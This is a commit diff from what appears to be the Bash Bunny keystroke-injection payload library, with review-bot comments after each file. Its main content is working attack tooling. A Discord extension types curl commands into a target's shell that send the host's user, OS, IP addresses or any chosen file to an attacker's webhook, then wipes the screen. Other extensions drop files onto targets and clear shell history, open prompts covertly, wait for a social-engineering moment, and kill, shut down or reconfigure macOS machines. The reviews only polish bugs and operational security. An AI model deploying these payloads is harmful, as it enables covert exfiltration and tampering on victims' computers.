38 Commits
863dc1f587
...
ab46e5062c
Author | SHA1 | Date |
---|---|---|
Aleff | ab46e5062c | |
Peaks | 9bc2a0312d | |
Rafa Guillermo | f7cf46fd95 | |
Rafa Guillermo | 774cc77212 | |
Rafa Guillermo | 5da19abe97 | |
Rafa Guillermo | b1cf7e8ef4 | |
Rafa Guillermo | 9bcb7f9240 | |
Rafa Guillermo | bf149a783b | |
Rafa Guillermo | bc36c76444 | |
Rafa Guillermo | 6a260cfd4b | |
Peaks | 8d901a02a8 | |
Peaks | 14fa7c490e | |
Peaks | 2559d728b1 | |
Peaks | 257081013d | |
Peaks | e6c3876429 | |
Peaks | 0e51172697 | |
Quentin Lamamy | 5ce34d6819 | |
Quentin Lamamy | a57046358b | |
Aleff | 463acb8559 | |
Aleff | fd03dfda79 | |
Aleff | 40e28fac9b | |
Aleff | 9892715933 | |
aleff-github | bc056509f0 | |
Aleff | 59d534c24c | |
quentinlamamy | 5cfae30936 | |
quentinlamamy | 971a981c9f | |
TheDragonkeeper | 963c000ab9 | |
Zappus | 4731402ad9 | |
bg-wa | a479964196 | |
bg-wa | 17e0b3d50c | |
GermanNoob | 18e36a88b0 | |
bg-wa | 5f06649cd2 | |
bg-wa | 9ab8820cc5 | |
bg-wa | b3b9f75200 | |
bg-wa | 5c764849f3 | |
bg-wa | afdafb27d6 | |
bg-wa | 821105a6a3 | |
bg-wa | 31ae33e78a |
|
@ -0,0 +1,86 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: Discord Extension
|
||||||
|
# Description: Interact with discord webhook to exfiltrate text or files
|
||||||
|
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Extension
|
||||||
|
#
|
||||||
|
# To use this extension, you need to create a webhook on discord and get the webhook id and token
|
||||||
|
# During your setup steps, you need to set the DISCORD_WEBHOOK_ID and DISCORD_WEBHOOK_TOKEN variables
|
||||||
|
# DISCORD_WEBHOOK_ID="<DISCORD_WEBHOOK_ID>""
|
||||||
|
# DISCORD_WEBHOOK_TOKEN="<DISCORD_WEBHOOK_TOKEN>"
|
||||||
|
|
||||||
|
function DISCORD() {
|
||||||
|
|
||||||
|
case $1 in
|
||||||
|
|
||||||
|
# @desc Initialize the exfiltration session by posting an embed message on discord with host information
|
||||||
|
# @usage DISCORD INIT
|
||||||
|
# @info This command need a $BB_HOST_* variables (Set by default if you use my OSX extension)
|
||||||
|
"INIT")
|
||||||
|
|
||||||
|
curl_location="https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN"
|
||||||
|
curl_header="Content-Type: application/json"
|
||||||
|
|
||||||
|
Q STRING "printf '\e7'"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "curl --location '$curl_location'"
|
||||||
|
Q STRING " --header '$curl_header'"
|
||||||
|
Q STRING " --data '{\"embeds\": [{\"author\": {\"name\": \"New exfiltration session\",\"icon_url\": \"https://cdn-icons-png.flaticon.com/512/2/2235.png\"},\"color\": \"15258703\",\"fields\": [{\"name\":\"OS\",\"value\":\""
|
||||||
|
Q STRING "'\${BB_HOST_OS}'"
|
||||||
|
Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
|
||||||
|
Q STRING "'\${BB_HOST_IP_V4}'"
|
||||||
|
Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
|
||||||
|
Q STRING "'\${BB_HOST_IP_V6}'"
|
||||||
|
Q STRING "\",\"inline\":true},{\"name\":\"User\",\"value\":\""
|
||||||
|
Q STRING "'\${BB_HOST_USER}'"
|
||||||
|
Q STRING "\",\"inline\":true}]"
|
||||||
|
Q STRING "}]}'"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
;;
|
||||||
|
|
||||||
|
"SEND")
|
||||||
|
|
||||||
|
case $2 in
|
||||||
|
|
||||||
|
# @desc Send a message to discord via webhook
|
||||||
|
# @usage DISCORD SEND MSG $yourMessage
|
||||||
|
"MSG")
|
||||||
|
|
||||||
|
if [[ "$3" == *"$"* ]]; then
|
||||||
|
message="'$3'"
|
||||||
|
else
|
||||||
|
message=$3
|
||||||
|
fi
|
||||||
|
|
||||||
|
Q STRING "printf '\e7'"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --header 'Content-Type: application/json' --data '{\"content\": \"$message\"}' && printf '\e[3A\e[K\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Send a file to discord via webhook
|
||||||
|
# @usage DISCORD SEND FILE $yourFilePath
|
||||||
|
"FILE")
|
||||||
|
Q STRING "printf '\e7'"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --form '=@\"$3\"' && printf '\e[3A\e[K\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
export -f DISCORD
|
|
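Review bot: Every branch types the webhook URL, including `$DISCORD_WEBHOOK_TOKEN`, in cleartext into the target's shell (L135/L154, L284, L327), so the token lands in the target's shell history and is visible in the process list while `curl` runs; the `printf '\e8...'` sequences only repaint the screen, and nothing in this file clears history. A webhook token alone is enough to post to or delete the webhook, so the header should say so and the SEND branches should at least run `history -c` the way the OSX extension's CLOSE does, e.g. `# NOTE: the webhook token is typed into the target shell in cleartext and persists in its history; treat the webhook as burned after the engagement.` The MSG branch (L253-L284) also splices `$message` inside a single-quoted `--data '...'` JSON literal, so a message containing `'` or `"` breaks the command or the JSON rather than being escaped. Minor: the second embed field on L178 is labelled "Public ip" again where the IPv6 value goes, and the example on L91 has a stray trailing quote.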
@ -0,0 +1,103 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# DROP v1 by bg-wa
|
||||||
|
# Simplifies dropping files from HID attacks for LINUX
|
||||||
|
# Usage: DROP [OS] bb_source_file.txt attack_destination_file.txt [overwrite: false] [executable: false]
|
||||||
|
#
|
||||||
|
# Example:
|
||||||
|
# DROP UNITY /root/udisk/payloads/$SWITCH_POSITION/source.sh ~/target_destination.sh true true
|
||||||
|
source ./run.sh
|
||||||
|
|
||||||
|
function DROP() {
|
||||||
|
os=$1
|
||||||
|
source=$2
|
||||||
|
destination=$3
|
||||||
|
overwrite=$4
|
||||||
|
executable=$5
|
||||||
|
|
||||||
|
case "$os" in
|
||||||
|
WIN)
|
||||||
|
RUN WIN powershell
|
||||||
|
;;
|
||||||
|
OSX)
|
||||||
|
RUN OSX terminal
|
||||||
|
;;
|
||||||
|
UNITY)
|
||||||
|
RUN UNITY terminal
|
||||||
|
;;
|
||||||
|
LINUX)
|
||||||
|
RUN LINUX terminal
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
RUN UNITY terminal
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
QUACK DELAY 1000
|
||||||
|
|
||||||
|
if "$overwrite" == "true"
|
||||||
|
then
|
||||||
|
case "$os" in
|
||||||
|
WIN)
|
||||||
|
QUACK STRING del "$destination"
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
QUACK STRING rm "$destination"
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
fi
|
||||||
|
|
||||||
|
case "$os" in
|
||||||
|
WIN)
|
||||||
|
QUACK STRING fsutil file createnew "$destination"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING notepad.exe "$destination"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 1000
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
QUACK STRING vi "$destination"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING i
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
while IFS= read -r data
|
||||||
|
do
|
||||||
|
QUACK STRING "$data"
|
||||||
|
QUACK ENTER
|
||||||
|
done < "$source"
|
||||||
|
|
||||||
|
QUACK DELAY 500
|
||||||
|
|
||||||
|
case "$os" in
|
||||||
|
WIN)
|
||||||
|
QUACK CTRL s
|
||||||
|
QUACK CRTL x
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
QUACK ESC
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING :wq
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
if "$executable" == "true"
|
||||||
|
then
|
||||||
|
QUACK STRING chmod +x "$destination"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
fi
|
||||||
|
|
||||||
|
QUACK STRING history -c
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING exit
|
||||||
|
QUACK ENTER
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
export -f DROP
|
|
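Review bot: `if "$overwrite" == "true"` on L526 and `if "$executable" == "true"` on L721 are not test expressions; bash runs the value of `$4`/`$5` as a command with `==` and `true` as its arguments, which only happens to work because `true` and `false` exist as commands, and an empty or unexpected value fails with "command not found" on the Bunny itself. Change both to `if [ "$overwrite" = "true" ]; then` and `if [ "$executable" = "true" ]; then`. `QUACK CRTL x` on L690 is a typo for `QUACK CTRL x`, so the Windows branch never closes Notepad after saving. `source ./run.sh` on L414 resolves against the caller's working directory rather than this file's location, which is fragile for a library meant to be sourced from payloads; the `while IFS= read -r` loop on L648 also skips a final line that has no trailing newline, so such a line is never typed into the target file.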
@ -0,0 +1,278 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: OSX Extension
|
||||||
|
# Description: Allow a bunch of osx interaction
|
||||||
|
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
|
||||||
|
# Version: 2.0
|
||||||
|
# Category: Extension
|
||||||
|
|
||||||
|
function OSX() {
|
||||||
|
|
||||||
|
case $1 in
|
||||||
|
|
||||||
|
"TERMINAL")
|
||||||
|
|
||||||
|
case $2 in
|
||||||
|
|
||||||
|
# @desc Open a terminal
|
||||||
|
# @usage OSX TERMINAL OPEN
|
||||||
|
"OPEN")
|
||||||
|
Q GUI SPACE
|
||||||
|
Q STRING terminal
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Initialize the terminal
|
||||||
|
# Make the PS1 nicer (just because I like it)
|
||||||
|
# Grab Host information and store it in BB_OSX vars
|
||||||
|
# @usage OSX TERMINAL INIT
|
||||||
|
# @info This command need a focused terminal
|
||||||
|
"INIT")
|
||||||
|
|
||||||
|
Q STRING "bash"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "clear"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "printf '\e7'"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "export PS1='\e[0;31mbashbunny>\e[m '"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING 'BB_HOST_USER=$(whoami)'
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
Q STRING 'BB_HOST_NAME=$(hostname)'
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
Q STRING "BB_HOST_OS='OSX'"
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
Q STRING 'BB_HOST_IP_V4=$(curl -s ipinfo.io/ip)'
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
Q STRING 'BB_HOST_IP_V6=$(curl -s ident.me)'
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Minimize the terminal
|
||||||
|
# @usage OSX TERMINAL MINIMIZE
|
||||||
|
# @info This command need a focused terminal
|
||||||
|
"MINIMIZE")
|
||||||
|
Q STRING 'printf \e[2t'
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Resize the focused terminal
|
||||||
|
# @usage OSX TERMINAL RESIZE $width $height
|
||||||
|
# @param <integer> $width The terminal width
|
||||||
|
# @param <integer> $height The terminal height
|
||||||
|
# @info This command need a focused terminal
|
||||||
|
"RESIZE")
|
||||||
|
Q STRING "printf '\e[8;'$4';'$3't' && printf '\e[2A\e[K\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Clear the focused terminal
|
||||||
|
# @usage OSX TERMINAL ZOOM
|
||||||
|
# @info This command need a focused terminal
|
||||||
|
"CLEAR")
|
||||||
|
Q STRING clear
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Close all terminal
|
||||||
|
# @usage OSX TERMINAL CLOSE
|
||||||
|
# @info This command need a focused terminal
|
||||||
|
"CLOSE")
|
||||||
|
Q STRING history -c
|
||||||
|
Q ENTER
|
||||||
|
Q STRING killall Terminal
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Change terminal window name
|
||||||
|
# @usage OSX TERMINAL NAME <WINDOW_NAME>
|
||||||
|
# @info This command need a focused terminal
|
||||||
|
"NAME")
|
||||||
|
Q STRING "printf '\033]0;'$3'\007' && printf '\e[2A\e[K\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
|
||||||
|
;;
|
||||||
|
|
||||||
|
"NETWORK")
|
||||||
|
|
||||||
|
case $2 in
|
||||||
|
|
||||||
|
"WIFI")
|
||||||
|
|
||||||
|
case $3 in
|
||||||
|
|
||||||
|
# @desc Enable wifi
|
||||||
|
# @usage OSX NETWORK WIFI ENABLE
|
||||||
|
"ENABLE")
|
||||||
|
Q STRING "networksetup -setairportpower en0 on"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Disable wifi
|
||||||
|
# @usage OSX NETWORK WIFI DISABLE
|
||||||
|
"DISABLE")
|
||||||
|
Q STRING "networksetup -setairportpower en0 off"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Connect to a wifi network
|
||||||
|
# @usage OSX NETWORK CONNECT $ssid $password
|
||||||
|
# @arg <string> Wifi SSID
|
||||||
|
# @arg <string> Wifi Password
|
||||||
|
"CONNECT")
|
||||||
|
Q STRING "networksetup -setairportnetwork en0 $4 $5"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
|
||||||
|
;;
|
||||||
|
|
||||||
|
"ETHERNET")
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
;;
|
||||||
|
|
||||||
|
"SESSION")
|
||||||
|
|
||||||
|
case $2 in
|
||||||
|
|
||||||
|
# @desc Shutdown the computer
|
||||||
|
# @usage OSX SESSION SHUTDOWN
|
||||||
|
"SHUTDOWN")
|
||||||
|
Q STRING "osascript -e 'tell app \"System Events\" to shut down'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Restart the computer
|
||||||
|
# @usage OSX SESSION RESTART
|
||||||
|
"RESTART")
|
||||||
|
Q STRING "osascript -e 'tell app \"System Events\" to restart'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Lock the computer
|
||||||
|
# @usage OSX SESSION LOCK
|
||||||
|
"LOCK")
|
||||||
|
Q STRING "osascript -e 'tell app \"System Events\" to sleep'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Logout current session
|
||||||
|
# @usage OSX SESSION LOGOUT
|
||||||
|
"LOGOUT")
|
||||||
|
Q STRING "osascript -e 'tell app \"System Events\" to log out'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
"GET_USER")
|
||||||
|
#Q STRING "BB_OSX_USER=$(who | grep console | cut -d ' ' -f 1)"
|
||||||
|
Q STRING 'BB_OSX_USER=$(whoami)'
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
|
||||||
|
;;
|
||||||
|
|
||||||
|
"SOUND")
|
||||||
|
|
||||||
|
case $2 in
|
||||||
|
|
||||||
|
"PLAY")
|
||||||
|
Q STRING "afplay $3"
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Change the computer volume
|
||||||
|
# @usage OSX MISC VOLUME $volumeValue
|
||||||
|
# @arg <integer> An integer between 0 and 10
|
||||||
|
"VOLUME")
|
||||||
|
Q STRING "osascript -e 'set Volume $3'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
;;
|
||||||
|
|
||||||
|
"NOTIFICATION")
|
||||||
|
|
||||||
|
case $2 in
|
||||||
|
|
||||||
|
"CLEAR")
|
||||||
|
Q STRING "ps -e | grep /NotificationCenter | grep app | cut -d ' ' -f 1 | xargs kill -9 && printf '\e[2A\e[K\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
"DISPLAY")
|
||||||
|
|
||||||
|
if [ -z $6]; then
|
||||||
|
$6=${1:-"Purr"}
|
||||||
|
fi
|
||||||
|
|
||||||
|
Q STRING "osascript -e 'display notification \"$3\" with title \"$4\" subtitle \"$5\" sound name \"$6\"'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
|
||||||
|
|
||||||
|
;;
|
||||||
|
|
||||||
|
"MISC")
|
||||||
|
|
||||||
|
case $2 in
|
||||||
|
|
||||||
|
# @desc Show or hide desktop icon
|
||||||
|
# @usage OSX MISC DESKTOP_ICON $action
|
||||||
|
# @arg <string> HIDE | void
|
||||||
|
"DESKTOP_ICON")
|
||||||
|
if [ $3 == "HIDE" ]; then
|
||||||
|
Q STRING "defaults write com.apple.finder CreateDesktop -bool false && killall Finder"
|
||||||
|
Q ENTER
|
||||||
|
else
|
||||||
|
Q STRING "defaults write com.apple.finder CreateDesktop -bool true && killall Finder"
|
||||||
|
Q ENTER
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Change wallpaper with the specified url image
|
||||||
|
# @usage OSX MISC WALLPAPER_URL
|
||||||
|
"WALLPAPER_URL")
|
||||||
|
Q STRING "cd ~/Desktop"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "curl $3 > img.bb"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "sqlite3 ~/Library/Application\ Support/Dock/desktoppicture.db \"update data set value = '~/Desktop/img.bb'\" && killall Dock"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
# @desc Say something in the way of bigben
|
||||||
|
# @usage OSX MISC SAY <VOICE> <TEXT_TO_SAY>
|
||||||
|
# @info Need a focused terminal
|
||||||
|
"SAY")
|
||||||
|
Q STRING "say -v $3 $4 && printf '\e[2A\e[K\e[0J'"
|
||||||
|
Q ENTER
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
export -f OSX
|
|
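Review bot: The NOTIFICATION DISPLAY branch (L1616-L1620) is broken bash: `[ -z $6]` is missing the space before `]`, and `$6=${1:-"Purr"}` is not an assignment (positional parameters cannot be assigned that way, and `$1` here is `NOTIFICATION`, not a default sound). Replace the block with `sound=${6:-Purr}` and use `sound name \"$sound\"` in the osascript string on L1631. NETWORK WIFI CONNECT (L1295) types the Wi-Fi password unquoted into the terminal, so it ends up in the target's shell history in cleartext and any SSID containing a space breaks the command; quote both arguments and note the exposure in the `@usage` comment. TERMINAL INIT (L968, L979) beacons to `ipinfo.io` and `ident.me` without a scheme, i.e. over plain HTTP, which exposes the session to on-path observers and to those third parties; `ident.me` also presumably returns whichever address family it was reached over, so `BB_HOST_IP_V6` is not guaranteed to hold an IPv6 address — worth a comment.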
@ -0,0 +1,126 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
################################################################################
|
||||||
|
# Quickly get to a prompt on any platform with the BashBunny
|
||||||
|
#
|
||||||
|
# How this works?
|
||||||
|
# 1) Once the library is included in your payload, launch terminal\powershell\run
|
||||||
|
# with:
|
||||||
|
# PROMPT [OS]
|
||||||
|
# 2) OS options are:
|
||||||
|
# "AUTO" : Default - Hak5 2124 cross platform code
|
||||||
|
# "UNITY" : Launches Terminal in Unity
|
||||||
|
# "UNITY_RUN" : Opens run prompt in Unity
|
||||||
|
# "MAC" : Launches Terminal in OSX
|
||||||
|
# "POWERSHELL" : Launches Powershell in Windows
|
||||||
|
# "WINDOWS_RUN": Opens run prompt in Windows
|
||||||
|
# 3) To close a prompt use:
|
||||||
|
# CLOSE_PROMPT [OS]
|
||||||
|
################################################################################
|
||||||
|
|
||||||
|
################################################################################
|
||||||
|
# Start HID Prompt
|
||||||
|
################################################################################
|
||||||
|
|
||||||
|
|
||||||
|
function PROMPT() {
|
||||||
|
if [ -z "$1" ]; then
|
||||||
|
OS="AUTO"
|
||||||
|
else
|
||||||
|
OS=$1
|
||||||
|
fi
|
||||||
|
|
||||||
|
#AUTO
|
||||||
|
if [ "${OS}" = "AUTO" ]; then
|
||||||
|
LED G B 100
|
||||||
|
QUACK ALT F2
|
||||||
|
QUACK DELAY 50
|
||||||
|
QUACK GUI SPACE
|
||||||
|
QUACK DELAY 50
|
||||||
|
QUACK GUI r
|
||||||
|
clear_active_input
|
||||||
|
wait_enter_wait 200 1000
|
||||||
|
fi
|
||||||
|
|
||||||
|
#UNITY
|
||||||
|
if [ "${OS}" = "UNITY" ]; then
|
||||||
|
LED R B 100
|
||||||
|
QUACK GUI
|
||||||
|
clear_active_input
|
||||||
|
QUACK STRING terminal
|
||||||
|
wait_enter_wait 200 1000
|
||||||
|
fi
|
||||||
|
|
||||||
|
#UNITY_RUN
|
||||||
|
if [ "${OS}" = "UNITY_RUN" ]; then
|
||||||
|
LED R B 100
|
||||||
|
QUACK ALT F2
|
||||||
|
fi
|
||||||
|
|
||||||
|
#MAC
|
||||||
|
if [ "${OS}" = "MAC" ]; then
|
||||||
|
LED R B G 100
|
||||||
|
QUACK GUI SPACE
|
||||||
|
clear_active_input
|
||||||
|
QUACK STRING terminal
|
||||||
|
wait_enter_wait 200 1000
|
||||||
|
fi
|
||||||
|
|
||||||
|
#POWERSHELL
|
||||||
|
if [ "${OS}" = "POWERSHELL" ]; then
|
||||||
|
LED B 100
|
||||||
|
QUACK GUI
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK powershell
|
||||||
|
wait_enter_wait 200 1000
|
||||||
|
fi
|
||||||
|
|
||||||
|
#WINDOWS_RUN
|
||||||
|
if [ "${OS}" = "WINDOWS_RUN" ]; then
|
||||||
|
LED B 100
|
||||||
|
QUACK GUI r
|
||||||
|
QUACK DELAY 500
|
||||||
|
fi
|
||||||
|
|
||||||
|
LED 0
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
function CLOSE_PROMPT() {
|
||||||
|
if [ -z "$1" ]; then
|
||||||
|
QUACK ALT F4
|
||||||
|
else
|
||||||
|
if [ "$1" = "MAC" ]; then
|
||||||
|
QUACK GUI w
|
||||||
|
else
|
||||||
|
QUACK ALT F4
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# HELPER FUNCTIONS
|
||||||
|
function wait_enter_wait() {
|
||||||
|
if [ -z "$1" ]; then
|
||||||
|
BEFORE_WAIT=100
|
||||||
|
else
|
||||||
|
BEFORE_WAIT=$1
|
||||||
|
fi
|
||||||
|
if [ -z "$2" ]; then
|
||||||
|
AFTER_WAIT=100
|
||||||
|
else
|
||||||
|
AFTER_WAIT=$2
|
||||||
|
fi
|
||||||
|
|
||||||
|
QUACK DELAY ${BEFORE_WAIT}
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY ${AFTER_WAIT}
|
||||||
|
}
|
||||||
|
|
||||||
|
function clear_active_input() {
|
||||||
|
QUACK DELAY 50
|
||||||
|
QUACK BACKSPACE
|
||||||
|
QUACK DELAY 100
|
||||||
|
}
|
||||||
|
|
||||||
|
export -f PROMPT
|
||||||
|
export -f CLOSE_PROMPT
|
|
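Review bot: `QUACK powershell` on L2120 is missing the `STRING` keyword, so the POWERSHELL path sends an unknown Ducky command instead of typing `powershell`; change it to `QUACK STRING powershell`. PROMPT and CLOSE_PROMPT are exported with `export -f`, but the helpers `wait_enter_wait` and `clear_active_input` that PROMPT calls are not, so anything that invokes PROMPT from a child process rather than the sourcing shell will fail on the missing helper — either export them too or state in the header that the library must be sourced. `OS`, `BEFORE_WAIT` and `AFTER_WAIT` are assigned as globals rather than `local`, leaking into the calling payload's namespace.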
@ -0,0 +1,23 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Social engineering wait by GermanNoob
|
||||||
|
#
|
||||||
|
# This extension can be used if no hidden access to the victim computer is possible and you have to social engineer your way to the target
|
||||||
|
# This script will mount as a standard drive and wait until the attacker starts the real payload by changing the switch position
|
||||||
|
#
|
||||||
|
# This is just a small extension to DarrenKitchen's WAIT
|
||||||
|
|
||||||
|
function SEWAIT() {
|
||||||
|
LED SPECIAL
|
||||||
|
ATTACKMODE STORAGE
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
TEST=$SWITCH_POSITION
|
||||||
|
LED SPECIAL2
|
||||||
|
while true
|
||||||
|
do GET SWITCH_POSITION
|
||||||
|
if [ $SWITCH_POSITION != $TEST ]; then break; fi
|
||||||
|
sleep 1
|
||||||
|
done
|
||||||
|
}
|
||||||
|
|
||||||
|
export -f SEWAIT
|
|
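Review bot: The comparison on L2393 uses unquoted `$SWITCH_POSITION` and `$TEST`, so if `GET SWITCH_POSITION` ever leaves the variable empty the test becomes `[ != switch1 ]` and errors instead of waiting; write it as `if [ "$SWITCH_POSITION" != "$TEST" ]; then break; fi`. Worth a caveat in the header: while this loop runs the device is in `ATTACKMODE STORAGE` (L2369), and L2346 says it mounts as a standard drive, so the udisk — payload scripts, tooling and any previously collected loot — is browsable by whoever is at the target, e.g. `# NOTE: the udisk is readable by the target while waiting; keep loot and tooling you do not want exposed off the drive.`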
@ -0,0 +1,36 @@
|
||||||
|
# Malware Bunny
|
||||||
|
## Overview
|
||||||
|
This Bash Bunny module is used to install many tools used for reverse engineering and malware analysis.
|
||||||
|
|
||||||
|
|
||||||
|
2 Operation Modes
|
||||||
|
* Web UI for quick access to samples
|
||||||
|
* SSH access for analysis sessions
|
||||||
|
|
||||||
|
|
||||||
|
## Getting Started
|
||||||
|
1. Get Bunny to access the Internet
|
||||||
|
2. Install all tools and components
|
||||||
|
* or - run setup.sh to install everything
|
||||||
|
* or - manually install every tool from setup scripts
|
||||||
|
3. Boot Bunny in Arming mode and upload payload files to switch1 and switch2
|
||||||
|
4. Boot Bunny in switch1 mode to access web interface
|
||||||
|
5. Boot Bunny in switch2 mode to access ssh interface
|
||||||
|
|
||||||
|
Web interface is meant long analysis sessions with minimal use, therefore CUCUMBER is enabled.
|
||||||
|
|
||||||
|
|
||||||
|
## Software Installed
|
||||||
|
1. viper v1.2
|
||||||
|
2. ssdeep v2.14.1
|
||||||
|
3. yara v3.7.0
|
||||||
|
4. pyew
|
||||||
|
6. featherduster
|
||||||
|
7. capstone
|
||||||
|
8. binwalk
|
||||||
|
9. dshell
|
||||||
|
10. wabt
|
||||||
|
11. peepdf
|
||||||
|
12. unzip
|
||||||
|
13. punbup
|
||||||
|
|
|
@ -0,0 +1,45 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: binwalk install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
|
||||||
|
apt-get install -y python-lzma python-crypto libqt4-opengl python-opengl python-qt4 python-qt4-gl python-numpy python-scipy python-pip mtd-utils gzip bzip2 tar arj lhasa p7zip p7zip-full cabextract cramfsprogs cramfsswap squashfs-tools sleuthkit default-jdk lzop srecord zlib1g-dev liblzma-dev liblzo2-dev liblzo2-dev python-lzo
|
||||||
|
pip install cstruct
|
||||||
|
|
||||||
|
cd /tools/
|
||||||
|
git clone https://github.com/ReFirmLabs/binwalk
|
||||||
|
cd binwalk
|
||||||
|
|
||||||
|
|
||||||
|
git clone https://github.com/devttys0/sasquatch
|
||||||
|
cd sasquatch/
|
||||||
|
ls
|
||||||
|
# edit build file to fix lack of sudo error on make install
|
||||||
|
# vi build.sh
|
||||||
|
./build.sh
|
||||||
|
|
||||||
|
cd ..
|
||||||
|
git clone https://github.com/sviehb/jefferson
|
||||||
|
cd jefferson
|
||||||
|
python setup.py install
|
||||||
|
|
||||||
|
cd ..
|
||||||
|
git clone https://github.com/jrspruitt/ubi_reader
|
||||||
|
cd ubi_reader
|
||||||
|
python setup.py install
|
||||||
|
|
||||||
|
cd ..
|
||||||
|
git clone https://github.com/devttys0/yaffshiv
|
||||||
|
